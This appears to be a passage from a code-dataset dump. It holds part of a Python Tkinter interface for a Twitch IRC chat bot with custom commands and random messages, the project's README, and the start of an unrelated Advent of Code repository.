int(self.botApplication.rmMessages.get()):\r\n                                        messageCount = 0\r\n                                        self.sendRandomMessage()\r\n                            print(sender,message)\r\n        except ConnectionAbortedError:\r\n            self.connected = False\r\n            self.botApplication.connectButton.config(text=\"Connect\",command=self.botApplication.connectBot)\r\n    \r\n    def getTarget(self,msg,sender):\r\n        messageSplit = msg.replace(\"@\",\"\").split(\" \")\r\n        if len(messageSplit) > 1 and messageSplit[1]:\r\n            target = messageSplit[1]\r\n        else:\r\n            target = sender\r\n        return target\r\n\r\n    def getActiveRM(self):\r\n        activeMessages = []\r\n        for message in randomMessages:\r\n            if message.isActive():\r\n                activeMessages.append(message)\r\n        return activeMessages\r\n\r\n    def getUserLevel(self,sender):\r\n        level = 0\r\n        if sender in self.getModerators():\r\n            level = 1\r\n        elif sender == self.CHAN.replace(\"#\",\"\"):\r\n            level = 2\r\n        return level\r\n\r\n    def parseMessages(self,sender,msg):\r\n        messageSplit = msg.split(\" \")\r\n        if messageSplit[0] in callableCommands:\r\n            currentCommand = callableCommands[messageSplit[0]]\r\n            if currentCommand.isActive():\r\n                if currentCommand.getUserLevel() <= self.getUserLevel(sender):\r\n                    if currentCommand.isCooleddown():\r\n                        currentCommand.lastCalled = datetime.datetime.now()\r\n                        return True\r\n        return False\r\n    \r\n    def getSender(self,msg):\r\n        result = \"\"\r\n        for char in msg:\r\n            if char ==\"!\":\r\n                break\r\n            if char != \":\":\r\n                result += char\r\n        return result\r\n\r\n    def getMessage(self,msg):\r\n        result = \"\"\r\n        i = 3\r\n        length = len(msg)\r\n\r\n        while i < length:\r\n            result += msg[i] + \" \"\r\n            i += 1\r\n        result = result.lstrip(':')\r\n        return result\r\n\r\n    def formatMessage(self,outgoingMessage,message,sender):\r\n        formats = {\"rv%\":random.choice(self.viewerList),\r\n                   \"RV%\":random.choice(self.viewerList).upper(),\r\n                   \"v%\":sender,\r\n                   \"V%\":sender.upper(),\r\n                   \"t%\":self.getTarget(message,sender).lower(),\r\n                   \"T%\":self.getTarget(message,sender).upper()}\r\n\r\n        for key in formats:\r\n            outgoingMessage = \"\".join(outgoingMessage).replace(key,formats[key])\r\n        return outgoingMessage\r\n    \r\n    def sendMessage(self, CHAN, MSG):\r\n        self.connection.send(bytes('PRIVMSG {} :{}\\r\\n'.format(CHAN,MSG),'UTF-8'))\r\n    \r\n    def sendPong(self,MSG):\r\n        self.connection.send(bytes('PONG {}\\r\\n'.format(MSG),'UTF-8'))\r\n    \r\n    def sendPass(self):\r\n        self.connection.send(bytes('PASS {}\\r\\n'.format(self.PASS),'UTF-8'))\r\n\r\n    def sendNick(self):\r\n        self.connection.send(bytes('NICK {}\\r\\n'.format(self.NICK),'UTF-8'))\r\n\r\n    def joinChannel(self):\r\n        self.connection.send(bytes('JOIN {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n\r\n    def partChannel(self):\r\n        self.connection.send(bytes('PART {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n    \r\nclass CommandDialog():\r\n    def __init__(self,parent,name=None,description=None,output=None,active=True,userLevel=\"viewer\",cooldown=5):\r\n        self.parent = parent\r\n        self.top = tk.Toplevel()\r\n\r\n        self.nameLabel = tk.Label(self.top,text=\"Name: \")\r\n        self.nameLabel.grid(column=1,row=1)\r\n        self.nameEntry = tk.Entry(self.top)\r\n        self.nameEntry.grid(column=2,row=1)\r\n\r\n        self.descLabel = tk.Label(self.top,text=\"Description: \")\r\n        self.descLabel.grid(column=1,row=2)\r\n        self.descEntry = tk.Entry(self.top)\r\n        self.descEntry.grid(column=2,row=2)\r\n\r\n        self.outLabel = tk.Label(self.top,text=\"Output: \")\r\n        self.outLabel.grid(column=1,row=3)\r\n        self.outEntry = tk.Entry(self.top)\r\n        self.outEntry.grid(column=2,row=3)\r\n\r\n        self.active = active\r\n\r\n        self.activeLabel = tk.Label(self.top,text=\"Active: \")\r\n        self.activeLabel.grid(column=1,row=4)\r\n        self.activeEntry = tk.Checkbutton(self.top,command=self.updateActive)\r\n        self.activeEntry.grid(column=2,row=4)\r\n\r\n        self.ulLabel = tk.Label(self.top,text=\"User Level: \")\r\n        self.ulLabel.grid(column=1,row=5)\r\n        self.ulVariable = tk.StringVar(self.top)\r\n        self.ulVariable.set(userLevel)\r\n        self.ulEntry = tk.OptionMenu(self.top, self.ulVariable, \"viewer\", \"moderator\", \"broadcaster\")\r\n        self.ulEntry.grid(column=2,row=5)\r\n\r\n        self.cdLabel = tk.Label(self.top,text=\"Cooldown: \")\r\n        self.cdLabel.grid(column=1,row=6)\r\n        self.cdInput = tk.Spinbox(self.top,from_=0, to=120)\r\n        self.cdInput.grid(column=2,row=6)\r\n\r\n        #Insert Default Data\r\n        self.originalName = name\r\n        if name:\r\n            self.nameEntry.insert(0,name)\r\n        if description:\r\n            self.descEntry.insert(0,description)\r\n        if output:\r\n            self.outEntry.insert(0,output)\r\n        if active:\r\n            self.activeEntry.select()\r\n        if cooldown:\r\n            self.cdInput.delete(0,tk.END)\r\n            self.cdInput.insert(0,cooldown)\r\n        #\r\n\r\n        self.submitButton = tk.Button(self.top, text=\"Submit\",command=self.submitCommand)\r\n        self.submitButton.grid(column=1,row=7)\r\n\r\n        self.cancelButton = tk.Button(self.top, text=\"Cancel\",command=self.cancelCommand)\r\n        self.cancelButton.grid(column=2,row=7)\r\n\r\n    def updateActive(self):\r\n        self.active = not(self.active)\r\n\r\n    def cancelCommand(self):\r\n        self.top.destroy()\r\n    \r\n    def submitCommand(self):\r\n        name = self.nameEntry.get()\r\n        description = self.descEntry.get()\r\n        active = self.active\r\n        output = 
1\r\n result = result.lstrip(':')\r\n return result\r\n\r\n def formatMessage(self,outgoingMessage,message,sender):\r\n formats = {\"rv%\":random.choice(self.viewerList),\r\n \"RV%\":random.choice(self.viewerList).upper(),\r\n \"v%\":sender,\r\n \"V%\":sender.upper(),\r\n \"t%\":self.getTarget(message,sender).lower(),\r\n \"T%\":self.getTarget(message,sender).upper()}\r\n\r\n for key in formats:\r\n outgoingMessage = \"\".join(outgoingMessage).replace(key,formats[key])\r\n return outgoingMessage\r\n \r\n def sendMessage(self, CHAN, MSG):\r\n self.connection.send(bytes('PRIVMSG {} :{}\\r\\n'.format(CHAN,MSG),'UTF-8'))\r\n \r\n def sendPong(self,MSG):\r\n self.connection.send(bytes('PONG {}\\r\\n'.format(MSG),'UTF-8'))\r\n \r\n def sendPass(self):\r\n self.connection.send(bytes('PASS {}\\r\\n'.format(self.PASS),'UTF-8'))\r\n\r\n def sendNick(self):\r\n self.connection.send(bytes('NICK {}\\r\\n'.format(self.NICK),'UTF-8'))\r\n\r\n def joinChannel(self):\r\n self.connection.send(bytes('JOIN {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n\r\n def partChannel(self):\r\n self.connection.send(bytes('PART {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n \r\nclass CommandDialog():\r\n def __init__(self,parent,name=None,description=None,output=None,active=True,userLevel=\"viewer\",cooldown=5):\r\n self.parent = parent\r\n self.top = tk.Tk()\r\n\r\n self.nameLabel = tk.Label(self.top,text=\"Name: \")\r\n self.nameLabel.grid(column=1,row=1)\r\n self.nameEntry = tk.Entry(self.top)\r\n self.nameEntry.grid(column=2,row=1)\r\n\r\n self.descLabel = tk.Label(self.top,text=\"Description: \")\r\n self.descLabel.grid(column=1,row=2)\r\n self.descEntry = tk.Entry(self.top)\r\n self.descEntry.grid(column=2,row=2)\r\n\r\n self.outLabel = tk.Label(self.top,text=\"Output: \")\r\n self.outLabel.grid(column=1,row=3)\r\n self.outEntry = tk.Entry(self.top)\r\n self.outEntry.grid(column=2,row=3)\r\n\r\n self.active = active\r\n\r\n self.activeLabel = tk.Label(self.top,text=\"Active: \")\r\n self.activeLabel.grid(column=1,row=4)\r\n self.activeEntry = tk.Checkbutton(self.top,command=self.updateActive)\r\n self.activeEntry.grid(column=2,row=4)\r\n\r\n self.ulLabel = tk.Label(self.top,text=\"User Level: \")\r\n self.ulLabel.grid(column=1,row=5)\r\n self.ulVariable = tk.StringVar(self.top)\r\n self.ulVariable.set(userLevel)\r\n self.ulEntry = tk.OptionMenu(self.top, self.ulVariable, \"viewer\", \"moderator\", \"broadcaster\")\r\n self.ulEntry.grid(column=2,row=5)\r\n\r\n self.cdLabel = tk.Label(self.top,text=\"Cooldown: \")\r\n self.cdLabel.grid(column=1,row=6)\r\n self.cdInput = tk.Spinbox(self.top,from_=0, to=120)\r\n self.cdInput.grid(column=2,row=6)\r\n\r\n #Insert Default Data\r\n self.originalName = name\r\n if name:\r\n self.nameEntry.insert(0,name)\r\n if description:\r\n self.descEntry.insert(0,description)\r\n if output:\r\n self.outEntry.insert(0,output)\r\n if active:\r\n self.activeEntry.select()\r\n if cooldown:\r\n self.cdInput.delete(0,tk.END)\r\n self.cdInput.insert(0,cooldown)\r\n #\r\n\r\n self.submitButton = tk.Button(self.top, text=\"Submit\",command=self.submitCommand)\r\n self.submitButton.grid(column=1,row=7)\r\n\r\n self.cancelButton = tk.Button(self.top, text=\"Cancel\",command=self.cancelCommand)\r\n self.cancelButton.grid(column=2,row=7)\r\n\r\n def updateActive(self):\r\n self.active = not(self.active)\r\n def cancelCommand(self):\r\n self.top.destroy()\r\n \r\n def submitCommand(self):\r\n name = self.nameEntry.get()\r\n description = self.descEntry.get()\r\n active = self.active\r\n output = 
self.outEntry.get()\r\n userLevel = self.ulVariable.get()\r\n cooldown = self.cdInput.get()\r\n\r\n callableCommands[name] = command(name,description,output,active,None,userLevel,cooldown)\r\n\r\n edit = False\r\n field = None\r\n \r\n if self.originalName:\r\n for item in self.parent.ccList.get_children():\r\n temp = self.parent.ccList.item(item,\"values\")\r\n if temp[1] == self.originalName:\r\n edit = True\r\n field = item\r\n\r\n if edit:\r\n index = self.parent.ccList.get_children().index(field)\r\n self.parent.ccList.delete(field)\r\n self.parent.ccList.insert(parent='',index=index, values=callableCommands[name].getValues()) \r\n else:\r\n index = len(self.parent.ccList.get_children())\r\n self.parent.ccList.insert(parent='',index=index, values=callableCommands[name].getValues())\r\n self.top.destroy()\r\n\r\nclass Application():\r\n def __init__(self,bot):\r\n self.bot = bot\r\n self.window = tk.Tk()\r\n self.window.title(\"Bot Interface\")\r\n\r\n self.window.geometry(\"705x365\")\r\n self.window.resizable(False,False)\r\n\r\n self.connected = False\r\n\r\n self.channelFrame = tk.LabelFrame(self.window, text=\"Channel: \",padx=5,pady=5)\r\n self.channelName = tk.Entry(master=self.channelFrame,justify=\"right\")\r\n self.connectButton = tk.Button(master=self.channelFrame,text=\"Connect\",command=self.connectBot)\r\n\r\n self.commandsFrame = tk.LabelFrame(self.window, text=\"Commands: \",padx=5,pady=5)\r\n self.notebook = ttk.Notebook(self.commandsFrame)\r\n self.ccFrame = tk.Frame(self.notebook)\r\n self.randomFrame = tk.Frame(self.notebook)\r\n\r\n ######################Callable Commands List#################\r\n self.ccList = ttk.Treeview(self.ccFrame)\r\n self.ccList['columns'] = ('Active','Name','Description','Output','User Level')\r\n self.ccList.column(\"#0\", width=0, stretch=tk.NO)\r\n self.ccList.column(\"Active\", anchor=tk.CENTER, width=45)\r\n self.ccList.column(\"Name\", anchor=tk.CENTER, width=65)\r\n self.ccList.column(\"Description\", anchor=tk.CENTER, width=80)\r\n self.ccList.column(\"Output\", anchor=tk.CENTER, width=110)\r\n self.ccList.column(\"User Level\", anchor=tk.CENTER, width=50)\r\n\r\n self.ccList.heading('#0', text='', anchor=tk.CENTER)\r\n self.ccList.heading('Active', text='Active', anchor=tk.CENTER)\r\n self.ccList.heading('Name', text='Name', anchor=tk.CENTER)\r\n self.ccList.heading('Description', text='Description', anchor=tk.CENTER)\r\n self.ccList.heading('Output', text='Output', anchor=tk.CENTER)\r\n self.ccList.heading('User Level', text='User Level', anchor=tk.CENTER)\r\n\r\n for item in callableCommands:\r\n commandValues=callableCommands[item].getValues()\r\n self.ccList.insert(parent='',index=0, values=commandValues)\r\n\r\n self.ccAddButton = tk.Button(master=self.ccFrame,text=\"Add\",command=self.ccAddCommand)\r\n self.ccActivateButton = tk.Button(master=self.ccFrame,text=\"Activate\",command=self.ccActivatePress,state='disabled')\r\n self.ccEditButton = tk.Button(master=self.ccFrame,text=\"Edit\",command=self.ccEditCommand,state='disabled')\r\n self.ccDeleteButton = tk.Button(master=self.ccFrame,text=\"Delete\",state='disabled',command=self.ccDeleteCommand) \r\n\r\n self.ccList.bind(\"<Double-Button-1>\",self.ccButtonActivation)\r\n self.ccAddButton.place(x=450,y=5,width=75)\r\n self.ccEditButton.place(x=450,y=35,width=75)\r\n self.ccActivateButton.place(x=450,y=65,width=75)\r\n self.ccDeleteButton.place(x=450,y=199,width=75)\r\n\r\n self.ccListScrollbar = tk.Scrollbar(self.ccFrame)\r\n 
self.ccListScrollbar.config(command=self.ccList.yview)\r\n self.ccList.config(yscrollcommand = self.ccListScrollbar.set)\r\n self.ccListScrollbar.place(x=430,y=5,height=220)\r\n\r\n self.rmList = ttk.Treeview(self.randomFrame)\r\n self.rmList['columns'] = ('Index','Active','Output')\r\n self.rmList.column('#0', width=0, stretch=tk.NO)\r\n self.rmList.column('Index', width=25, stretch=tk.NO)\r\n self.rmList.column('Active', width=45, stretch=tk.NO)\r\n self.rmList.column('Output', width=353, stretch=tk.NO)\r\n\r\n self.rmList.heading('#0', text='', anchor=tk.CENTER)\r\n self.rmList.heading('Index', text='#', anchor=tk.CENTER)\r\n self.rmList.heading('Active', text='Active', anchor=tk.CENTER)\r\n self.rmList.heading('Output', text='Output', anchor=tk.CENTER)\r\n\r\n for index in range(len(randomMessages)):\r\n messageValues=randomMessages[index].getValues(index)\r\n self.rmList.insert(parent='',index=index, values=messageValues)\r\n\r\n self.rmAddButton = tk.Button(master=self.randomFrame,text=\"Add\",command=self.rmAddMessage)\r\n self.rmActivateButton = tk.Button(master=self.randomFrame,text=\"Activate\",command=self.rmActivatePress,state='disabled')\r\n self.rmEditButton = tk.Button(master=self.randomFrame,text=\"Edit\",command=self.rmEditMessage,state='disabled')\r\n self.rmDeleteButton = tk.Button(master=self.randomFrame,text=\"Delete\",state='disabled',command=self.rmDeleteMessage)\r\n \r\n self.rmList.bind(\"<Double-Button-1>\",self.rmButtonActivation)\r\n\r\n self.rmAddButton.place(x=450,y=5,width=75)\r\n self.rmEditButton.place(x=450,y=35,width=75)\r\n self.rmActivateButton.place(x=450,y=65,width=75)\r\n self.rmDeleteButton.place(x=450,y=199,width=75)\r\n\r\n self.rmListScrollbar = tk.Scrollbar(self.randomFrame)\r\n self.rmListScrollbar.config(command=self.rmList.yview)\r\n self.rmList.config(yscrollcommand = self.rmListScrollbar.set)\r\n self.rmListScrollbar.place(x=430,y=5,height=220)\r\n \r\n ##################################################################\r\n\r\n self.notebook.add(self.ccFrame, text=\"Callable Commands\")\r\n self.notebook.add(self.randomFrame, text=\"Random Messages\")\r\n\r\n ##################################################################\r\n\r\n #####################Viewer List##################################\r\n self.viewerFrame = tk.LabelFrame(self.window, text=\"Viewers: \",padx=5,pady=5)\r\n self.viewerListbox = tk.Listbox(self.viewerFrame,activestyle=\"none\",exportselection=False,height=285)\r\n\r\n self.viewerListbox.pack()\r\n self.viewerFrame.place(x=5,y=75,height=285,width=138)\r\n ##################################################################\r\n\r\n self.channelName.insert(0,CHAN)\r\n self.channelName.pack()\r\n self.connectButton.pack()\r\n self.channelFrame.place(x=5,y=0,height=75)\r\n\r\n self.ccList.place(x=5,y=5,height=220,width=425)\r\n self.rmList.place(x=5,y=5,height=220,width=425)\r\n\r\n self.notebook.place(x=0,y=0,width=535,height=255)\r\n self.commandsFrame.place(x=150,y=75,height=285,width=550)\r\n\r\n self.settingsFrame = tk.LabelFrame(self.window, text=\"Settings: \",padx=5,pady=5)\r\n self.nickLabel = tk.Label(self.settingsFrame, text=\"User: \")\r\n self.nickEntry = tk.Entry(master=self.settingsFrame,justify=\"right\",width=35)\r\n self.nickEntry.insert(0,NICK)\r\n self.nickLabel.place(x=0,y=0)\r\n self.nickEntry.place(x=50,y=0)\r\n\r\n self.oauthLabel = tk.Label(self.settingsFrame, text=\"Oauth: \")\r\n self.oauthEntry = tk.Entry(master=self.settingsFrame,justify=\"right\",width=35)\r\n 
self.oauthEntry.insert(0,PASS)\r\n self.oauthLabel.place(x=0,y=20)\r\n self.oauthEntry.place(x=50,y=20)\r\n\r\n self.separator = ttk.Separator(self.settingsFrame,orient='vertical')\r\n self.separator.place(x=270,y=-5,height=50)\r\n\r\n self.iterateRM = RMIT\r\n\r\n self.iterateLabel = tk.Label(self.settingsFrame,text=\"Message Iteration: \")\r\n self.iterateLabel.place(x=280,y=0)\r\n self.iterateEntry = tk.Checkbutton(self.settingsFrame,command=self.updateIteration)\r\n self.iterateEntry.place(x=380,y=0)\r\n if self.iterateRM:\r\n self.iterateEntry.select()\r\n\r\n #Checkbox = Command = StartCountdown\r\n #Checkbox = Allow Message Countdown\r\n\r\n self.rmMessages = tk.Spinbox(self.settingsFrame,from_=1, to=5000)\r\n\r\n self.rmMessages.delete(0,tk.END)\r\n self.rmMessages.insert(0,EMES)\r\n \r\n self.rmMessageLabel = tk.Label(self.settingsFrame,text=\"Messages: \")\r\n\r\n self.rmMessages.place(x=490,y=0,width=40)\r\n self.rmMessageLabel.place(x=415,y=0)\r\n\r\n self.allowMessages = AMES\r\n\r\n self.rmAMessageLabel = tk.Label(self.settingsFrame,text=\"Random Message Active: \")\r\n self.rmMessagesCheck = tk.Checkbutton(self.settingsFrame,command=self.updateAMes)\r\n\r\n if self.allowMessages:\r\n self.rmMessagesCheck.select()\r\n\r\n self.settingsLocked = True\r\n self.lockButton = tk.Button(self.settingsFrame,text=\"Unlock\",command=self.settingsLock)\r\n \r\n self.rmAMessageLabel.place(x=280,y=20)\r\n self.rmMessagesCheck.place(x=420,y=20)\r\n self.lockButton.place(x=480,y=20,width=50)\r\n\r\n self.rmMessagesCheck.config(state=\"disabled\")\r\n self.rmMessages.config(state=\"disabled\")\r\n self.iterateEntry.config(state=\"disabled\")\r\n self.oauthEntry.config(state=\"disabled\")\r\n self.nickEntry.config(state=\"disabled\")\r\n #Random Messages Settings\r\n #Number of Messages\r\n #Time between Messages\r\n \r\n self.settingsFrame.place(x=150,y=0,height=75,width=550)\r\n\r\n self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n self.window.mainloop()\r\n\r\n def settingsLock(self):\r\n self.settingsLocked = not(self.settingsLocked)\r\n if self.settingsLocked:\r\n self.lockButton.config(text=\"Unlock\")\r\n self.rmMessagesCheck.config(state=\"disabled\")\r\n self.rmMessages.config(state=\"disabled\")\r\n self.iterateEntry.config(state=\"disabled\")\r\n self.oauthEntry.config(state=\"disabled\")\r\n self.nickEntry.config(state=\"disabled\")\r\n else:\r\n self.lockButton.config(text=\"Lock\")\r\n self.rmMessagesCheck.config(state=\"normal\")\r\n self.rmMessages.config(state=\"normal\")\r\n self.iterateEntry.config(state=\"normal\")\r\n self.oauthEntry.config(state=\"normal\")\r\n self.nickEntry.config(state=\"normal\")\r\n \r\n def updateAMin(self):\r\n self.allowMinutes = not(self.allowMinutes)\r\n\r\n def updateAMes(self):\r\n self.allowMessages = not(self.allowMessages)\r\n \r\n def updateIteration(self):\r\n self.iterateRM = not(self.iterateRM)\r\n \r\n def addViewer(self,viewerName):\r\n self.viewerListbox.insert(self.viewerListbox.size(),viewerName)\r\n \r\n def ccActivatePress(self):\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n command = callableCommands[temp[1]]\r\n command.invertActive()\r\n if command.isActive():\r\n self.ccActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.ccActivateButton.config(text=\"Activate\")\r\n self.ccList.item(self.ccList.focus(),values=command.getValues())\r\n\r\n def ccAddCommand(self):\r\n CommandDialog(self)\r\n \r\n def ccDeleteCommand(self):\r\n try:\r\n temp = 
self.ccList.item(self.ccList.focus(),\"values\")\r\n answer = messagebox.askokcancel(\"Question\",f\"Delete Command {temp[1]}\")\r\n if answer:\r\n callableCommands.pop(temp[1],None)\r\n self.ccList.delete(self.ccList.focus())\r\n except:\r\n pass\r\n\r\n def ccEditCommand(self):\r\n try:\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n command = callableCommands[temp[1]]\r\n CommandDialog(self,command.name,command.description,command.output,command.active,command.userLevel,command.cooldown) \r\n except:\r\n pass\r\n \r\n def ccButtonActivation(self,event):\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n if temp[0] == tick:\r\n self.ccActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.ccActivateButton.config(text=\"Activate\")\r\n self.ccActivateButton.config(state=\"active\")\r\n self.ccEditButton.config(state=\"active\")\r\n self.ccDeleteButton.config(state=\"active\")\r\n ###############################################\r\n\r\n ####################Random Commands List#####################\r\n\r\n def rmActivatePress(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n message = randomMessages[index]\r\n message.invertActive()\r\n if message.isActive():\r\n self.rmActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.rmActivateButton.config(text=\"Activate\")\r\n self.rmList.item(self.rmList.focus(),values=message.getValues(index))\r\n except:\r\n pass\r\n \r\n def rmDeleteMessage(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n temp = self.rmList.item(self.rmList.focus(),\"values\")\r\n answer = messagebox.askokcancel(message=f\"Delete Message #{temp[0]}\")\r\n if answer:\r\n randomMessages.pop(index)\r\n self.rmList.delete(self.rmList.focus())\r\n except:\r\n pass\r\n\r\n def rmAddMessage(self):\r\n try:\r\n newMessage = simpledialog.askstring(title=\"\",prompt=\"Input Message: \",parent=self.window)\r\n if newMessage:\r\n newMessage = message(newMessage)\r\n randomMessages.append(newMessage)\r\n index = len(self.rmList.get_children())\r\n self.rmList.insert(parent='',index=index, values=newMessage.getValues(index))\r\n except:\r\n pass\r\n\r\n def rmEditMessage(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n newMessage = simpledialog.askstring(title=\"\",prompt=\"Input Message: \",parent=self.window)\r\n randomMessages[index].message = newMessage\r\n \r\n self.rmList.item(self.rmList.focus(),values=randomMessages[index].getValues(index))\r\n except Exception as e:\r\n print(e)\r\n \r\n def rmButtonActivation(self,event):\r\n temp = self.rmList.item(self.rmList.focus(),\"values\")\r\n index = int(temp[0])\r\n if temp[1] == tick:\r\n self.rmActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.rmActivateButton.config(text=\"Activate\")\r\n self.rmActivateButton.config(state=\"active\")\r\n self.rmEditButton.config(state=\"active\")\r\n self.rmDeleteButton.config(state=\"active\")\r\n \r\n #####################################################\r\n\r\n #####################Built In Commands List######################\r\n\r\n def connectBot(self):\r\n self.bot.startConnection(self)\r\n self.connectButton.config(text=\"Disconnect\",command=self.disconnectBot)\r\n\r\n def disconnectBot(self):\r\n self.bot.stopConnection()\r\n self.connectButton.config(text=\"Connect\",command=self.connectBot)\r\n\r\n def getBotValues(self):\r\n botInfo = {\"CHAN\":self.channelName.get(),\r\n \"NICK\":self.nickEntry.get(),\r\n 
\"PASS\":self.oauthEntry.get(),\r\n \"RMIT\":self.iterateRM,\r\n \"AMES\":self.allowMessages,\r\n \"EMES\":self.rmMessages.get()}\r\n return botInfo\r\n \r\n def on_closing(self):\r\n botInfo = self.getBotValues()\r\n pickle.dump(botInfo,open(\"botCredentials.p\",\"wb\"))\r\n pickle.dump(callableCommands,open(\"CommandsList.p\",\"wb\"))\r\n pickle.dump(randomMessages,open(\"randomMessages.p\",\"wb\"))\r\n self.window.destroy()\r\n\r\nbot = Bot()\r\nApplication(bot)\r\n" }, { "alpha_fraction": 0.7638232707977295, "alphanum_fraction": 0.7643789649009705, "avg_line_length": 63.26785659790039, "blob_id": "f6078efe830dc50da30effee7cc1cd84d64bf33c", "content_id": "cfd2b1494be34db59797ddbbfd6e192c8543811d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3599, "license_type": "no_license", "max_line_length": 275, "num_lines": 56, "path": "/README.md", "repo_name": "DominicMuckzZ/Twitch-Bot-Interface", "src_encoding": "UTF-8", "text": "# Twitch-Bot-Interface\nThe application provides an interface for a custom bot \nAllowing users to set up custom commands for viewers to use, messages to be output after every nth message and show a list of all participants of the chat for the current connection to Twitch's irc. \n\n## Setting Up\nTo set up and connect to a channel you need three pieces of information \n* The bot username\n* The bot oauth password (https://twitchapps.com/tmi/)\n * This must include the 'oauth:' part of the string\n* And the name of the channel you want to connect to (proceed this by a #)\nOnce these fields are filled in you can connect the bot.\n\nThe application provides a navigatable user interface that allows users to set up either \"Callable Commands\" or \"Random Messages\". \n## Callable Commands \nallow for a user to type the name of the command into twitch's chat function and receive a response provided certain criteria is met. \nThe criteria can be: \n * A cooldown between messages \n * A certain \"User Level\" the viewer must be \n * This allows for Moderator or Broadcaster only commands \n * If the command is \"Active\" and available for use by viewers \n \n### Callable Commands Formatting:\nKey | Output\n---|------\nt% | The word/name following the command, if there is no word the channel name\nT% | The capitalised work/name following the command, if there is no word, the channel name\nv% | The command caller's (message sender's) name\nV% | The command caller's (message sender's) capitalised name\nrv% | A random chatter's name from the viewer list\nRV% | A random chatter's capitalised name from the viewer list\n\n## Random Messages \nallow for an output into the chat upon every nth message received \nThese messages do not have incredibly flexible settings \n * They can be turned on/off, either individually or all together \n * They can be set to iterate instead of randomise so that the messages will not repeat by accident \n * The nth number is changeable \n \nThe settings for both Random Messages and Callable Commands are asyncronous and so they can be changed whilst the bot is in use. \nFor example: \n * The random messages can be turned off for 10 messages and then turned back on. This will prevent the bot from counting these messages and so delaying the output. \n * The number of messages required before a random message is output can be changed. \n \nOther settings such as oauth, nick, and channel need to be set up before the bot is connected otherwise it will refuse to connect. 
\nThese can be adjusted whilst the bot is connected, but will not affect the bot's ability to connect until the next attempt to start a connection. \nThe settings for the bot and commands save upon exit of the application and will be remembered for the next use. \n\n## Current Limitations: \n* There is no built-in API access which would allow live data to be retrieved from Twitch \n* Only one bot \"profile\" is available, so values must be changed if it is to be used on another channel. \n* Duplicate command names cannot be in use, so you are unable to have two commands that share the name \"!so\" and have two different outputs. \n * In future updates this may be changed to have the Callable Commands work off a list instead of a dictionary; this would allow multiple commands to be used, those that pertain to the viewer's user level to be prioritised, and an output to be chosen based on these criteria. \n* A moderator will not be immediately recognised when they come into chat. \n\n### New Updates:\nThe list of moderators is dynamic and is received through Twitch\n" } ]
2
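The placeholder keys documented in the README above map one-to-one onto the `formats` dictionary in `formatMessage`. Below is a minimal standalone sketch of that substitution; the viewer names and the template are illustrative only, and a length guard is added to the target lookup, since the original `getTarget` indexes `messageSplit[1]` unconditionally and would raise `IndexError` on a bare command.

```python
import random

# Illustrative stand-ins for the bot's state; none of these values come from the repo.
viewer_list = ["alice", "bob", "carol"]

def get_target(msg, sender):
    # Word after the command, falling back to the sender (guarded, unlike the original).
    parts = msg.replace("@", "").split(" ")
    return parts[1] if len(parts) > 1 else sender

def format_message(template, message, sender):
    # Same substitution table as formatMessage; each key is replaced wherever it appears.
    # Dict order matters: "rv%" must be replaced before "v%" so it is not clobbered.
    formats = {"rv%": random.choice(viewer_list),
               "RV%": random.choice(viewer_list).upper(),
               "v%": sender,
               "V%": sender.upper(),
               "t%": get_target(message, sender).lower(),
               "T%": get_target(message, sender).upper()}
    for key, value in formats.items():
        template = template.replace(key, value)
    return template

print(format_message("v% sends a shoutout to t%!", "!so @bob", "alice"))
# -> alice sends a shoutout to bob!
```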
erchiggins/advent-of-code
https://github.com/erchiggins/advent-of-code
8820e99c549a10ddfb9d5f841e88a4b973f73313
bf5e7242d9322accb9586d513f70443e2d51e21d
2cc0b465c1bc11edfbdc5d31f05701ee9e393269
refs/heads/master
2020-12-08T04:28:38.626153
2020-01-30T20:48:25
2020-01-30T20:48:25
232,884,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6205962300300598, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 29.33333396911621, "blob_id": "952614087c5a4c7905547685395b104c3033b3ea", "content_id": "40508a3faf4480a1716876e214318a72c96ff551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/day3.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "# read in from file\n# process each path as a set of tuples with coordinates\n# (model steps RLUD as individual segments)\n# find intersect of sets of tuples \n# minimum value in intersection\n\n\nif __name__ == \"__main__\":\n with open('day3input.txt') as f:\n raw_input = f.readlines()\n wire_0 = raw_input[0].split(',')\n wire_1 = raw_input[1].split(',')\n \n" }, { "alpha_fraction": 0.47474047541618347, "alphanum_fraction": 0.5031141638755798, "avg_line_length": 28.83333396911621, "blob_id": "f6636a995105e4194566131ea9dbc02dd4ec20bb", "content_id": "83fd7692377035cf0e3f788b2a3ca2a1259033e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 73, "num_lines": 48, "path": "/day2.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": " \ndef computer(tape):\n index = 0\n while True:\n instruction = tape[index]\n if instruction == 1:\n tape[tape[index+3]] = tape[tape[index+1]]+tape[tape[index+2]]\n elif instruction == 2:\n tape[tape[index+3]] = tape[tape[index+1]]*tape[tape[index+2]]\n elif instruction == 99:\n # print('Opcode 99, program complete')\n break\n else:\n raise Exception(f'Unknown opcode {instruction}!')\n index += 4\n return tape\n\ndef find_result(input_strings):\n noun = 0\n while noun <= 99:\n verb = 0\n while verb <= 99:\n # (re)set input ints\n input_ints = [int(input) for input in input_strings]\n input_ints[1] = noun\n input_ints[2] = verb\n # check 